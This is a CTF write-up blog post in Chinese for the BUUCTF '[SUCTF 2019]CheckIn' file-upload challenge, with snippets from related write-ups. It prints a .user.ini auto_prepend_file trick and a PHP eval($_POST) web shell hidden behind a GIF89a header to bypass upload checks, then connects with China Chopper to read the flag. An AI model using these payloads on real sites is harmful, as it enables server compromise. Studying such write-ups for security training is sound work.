[SUCTF 2019]CheckIn 1

已于 2022-07-20 09:26:49 修改
阅读量389 收藏 1
点赞数
文章标签: web
于 2022-07-03 10:05:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43618536/article/details/125577323
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

[SUCTF 2019]CheckIn 1

题目

BUUCTF的[SUCTF 2019]CheckIn 1
在这里插入图片描述

一、做题步骤

1.上传文件

1.上传.user.ini文件,这个文件必须在一句话木马前上传

GIF89a  
auto_prepend_file=1.jpg

在这里插入图片描述

2.上传一句话木马

GIF89a
<script language ="php">
eval($_POST[1]);
</script>

在这里插入图片描述

2.菜刀连接

1.添加信息

http://53aeef0f-64de-4f9f-81ef-4c9667c6e6b2.node4.buuoj.cn:81/uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php

因为看到当前目录下有个index.php文件,所以以此作为上传路径

在这里插入图片描述

2.获取flag
根目录下有flag文件
flag{dd4a4121-739f-4586-bbc1-be9b4ea3baf7}

在这里插入图片描述

林本
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web buuctf [SUCTF 2019]CheckIn1
weixin_44214568的博客
03-15 1480
如图,应该是一个文件上传的题目; 1.上传一句话木马: 上传php文件,提示illegal suffix!(非法后缀),改一下后缀,php3,phtml,Php都是一样的提示,应该是对文件后缀进行了过滤 改成jpg格式的提示exif_imagetype:not image!,后台函数进行了过滤 2.改文件头GIF89a?<script language="php">eval($_post['a']);</script> 上传后提示 能够看到文件上传的路径,和文件所在位..
文件上传 [SUCTF 2019]CheckIn1
m0_75178803的博客
11-13 371
图片马就是把一句话木马,通过二进制的方式追加到图片文件末尾,将木马文件和图片合并为另一个图片文件,合并后的图片包含一句话木马而且不影响图片显示,但用记事本等文本编辑器打开,能看到图片末尾的恶意代码。原因:.user.ini中auto_prepend_file函数会在执行index.php前把我们的一句话木马文件包含进来,并解析为php格式,而且这个函数是在执行加载第一个PHP代码之前执行指示(包含的)PHP文件。用记事本打开5.jpg,在乱码的末尾发现了我们加上去的一句话木马(图片是能正常显示的)
BUU实战笔记——[SUCTF 2019]CheckIn 1
qq_51175992的博客
07-14 168
文件上传中利用到.user.ini配置文件
[SUCTF 2019]CheckIn
热门推荐
沐目的博客
10-22 1万+
一、知识点 1.1exif_imagetype() 打开发现是上传,发现可以上传jpg等格式的文件。然后上传txt格式的文件,发现后台好像是通过exif_imagetype函数判断的— 判断一个图像的类型。 <?php if (exif_imagetype("image.gif") != IMAGETYPE_GIF) { echo "The picture is not a gif"...
[SUCTF 2019]CheckIn1
biggerpig的博客
09-29 1733
[SUCTF 2019]CheckIn1
[SUCTF 2019]CheckIn 1
m0_51426816的博客
03-12 248
查看GitHub中的源码 <?php // error_reporting(0); $userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]); if (!file_exists($userdir)) { mkdir($userdir, 0777, true); } file_put_contents($userdir . "/index.php", ""); if (isset($_POST["upload"])) { $tmp_name
checkin
03-18
报到 此仓库包含为测试“深层链接”教程而开发的“酒店基本入住”网站应用程序。 部署方式 通过单击以下按钮之一,您可以轻松地免费将自己的Web应用程序版本免费部署到Heroku。 起动机 最终的
checkin1:第5组TCSS 360
05-14
自述文件 TCSS 360第5组 小组成员: 哈里·库杜瓦(Hari G Kuduva) 邱天ice 拜萨尔贝克·乌鲁斯坦别科夫 香农·韦斯顿(Shannon Weston)
glados_checkin
03-25
glados定时签到
checkin-system
05-19
1.安装node.js 安装并启动node.js。 ( ) $ node --version 安装并启动mongoDB。 ( ) $ cd mongodb $ mkdir -p data/db $ bin/mongod --dbpath data/db & 2.克隆gsshop-checkin $ git clone ...
[SUCTF 2019] CheckIn 1
feng的博客
10-22 1131
知识点 上传.user.ini文件,条件如下: (1)服务器脚本语言为PHP (2)对应目录下面有可执行的php文件 (3)服务器使用CGI/FastCGI模式 现在大部分网站都是用的fastcgi,这个东西我理解的是可以提供web服务器的一种api,而apache/nginx/iis这些服务器都会依靠这种api来运行 而在服务器以fastcgi启动运行的时候,.user.ini也是php的一种配置文件,众所周知php.ini是php的配置文件,它可以做到显示报错,导入扩展,文件解析,web站点路径等等设置
[SUCTF 2019]CheckIn 1(详解)
qq_52843575的博客
12-12 5936
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
[SUCTF 2019]CheckIn 1 学习笔记
weixin_45869407的博客
10-15 383
刚刚做到这道题的时候以为就只是一个简答的文件上传,结果发现自己上传的图片马被拦截了,发现不能有<?符合,然后改成,但最后不知道该怎么弄,无奈自己太菜,只能看大佬writeup(做题不是关键) ...
BUUCTF——[SUCTF 2019]CheckIn 1
weixin_45864041的博客
09-27 3366
根据普通的文件上传漏洞走 上传shell.jpg后可以看见上传失败,并且对文件的内容进行了检查。所以,我们换一种木马形式。 用shell.phtml进行上传。 上传失败,对文件内容进行了检查。利用文件幻术头进行绕过。 上传成功。接下来,我们再一次上传并抓包,修改文件后缀 上传又失败了。如果我们仅上传jpg文件,是无法让我们通过中国菜刀进行连接的。 最后束手无策只有看了一下大佬的wp 又学到了新姿势。 可以上传一个.user.ini 文件,当我们对目录中的任何php文件进行访问时,都会调用.use.
基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
最新发布
05-31
【优质项目推荐】 1、项目代码均经过严格本地测试,运行OK,确保功能稳定后才上传平台。可放心下载并立即投入使用,若遇到任何使用问题,随时欢迎私信反馈与沟通,博主会第一时间回复。 2、项目适用于计算机相关专业(如计科、信息安全、数据科学、人工智能、通信、物联网、自动化、电子信息等)的在校学生、专业教师,或企业员工,小白入门等都适用。 3、该项目不仅具有很高的学习借鉴价值,对于初学者来说,也是入门进阶的绝佳选择;当然也可以直接用于 毕设、课设、期末大作业或项目初期立项演示等。 3、开放创新:如果您有一定基础,且热爱探索钻研,可以在此代码基础上二次开发,进行修改、扩展,创造出属于自己的独特应用。 欢迎下载使用优质资源!欢迎借鉴使用,并欢迎学习交流,共同探索编程的无穷魅力! 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
git checkin
05-12
你可能想问的是 git commit 命令,它用于将代码更改提交到本地 Git 仓库中。可以使用以下命令提交更改: ``` git add ....git commit -m "提交信息" # 提交更改并添加提交信息 ``` 请注意,在提交代码之前,您需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值